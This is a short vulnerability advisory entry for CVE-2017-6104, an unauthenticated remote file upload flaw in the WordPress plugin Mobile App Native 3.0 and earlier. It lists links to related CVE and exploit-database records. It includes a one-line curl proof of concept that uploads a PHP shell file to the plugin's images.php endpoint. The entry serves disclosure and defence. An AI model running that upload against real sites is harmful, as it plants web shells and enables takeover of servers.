Lucene search
Larry W. CashdollarWPEX-ID:6EF8703E-DFB8-48E2-91BB-B8D8B766E093HistoryFeb 28, 2017 - 12:00 a.m.
Mobile App Native <= 3.0 - Remote File Upload
2017-02-2800:00:00
Larry W. Cashdollar
7
0.003 Low
EPSS
Percentile
69.6%
The code in file ./zen-mobile-app-native/server/images.php doesn’t require authentication or check that the user is allowed to upload content. It also doesn’t sanitize the file upload against executable code.
$ curl -F "file=@/var/www/shell.php" "http://example.com/wp-content/plugins/zen-mobile-app-native/server/images.php"Related
cvelist
cvelist
CVE-2017-6104
2017-03-02 22:00:00
cve
cve
CVE-2017-6104
2017-03-02 22:59:00
nvd
nvd
CVE-2017-6104
2017-03-02 22:59:00
packetstorm
packetstorm
WordPress Mobile App Native 3.0 Shell Upload
2017-03-02 00:00:00
WordPress Multiple Plugin File Upload
2017-03-17 00:00:00
seebug
seebug
Remote file upload vulnerability in Wordpress Plugin Mobile App Native 3.0
2017-03-03 00:00:00
wpvulndb
wpvulndb
Mobile App Native <= 3.0 - Remote File Upload
2017-02-28 00:00:00
prion
prion
Design/Logic Flaw
2017-03-02 22:59:00
exploitpack
exploitpack
WordPress Multiple Plugins - Arbitrary File Upload
2017-03-03 00:00:00
exploitdb
exploitdb
Multiple WordPress Plugins - Arbitrary File Upload
2017-03-03 00:00:00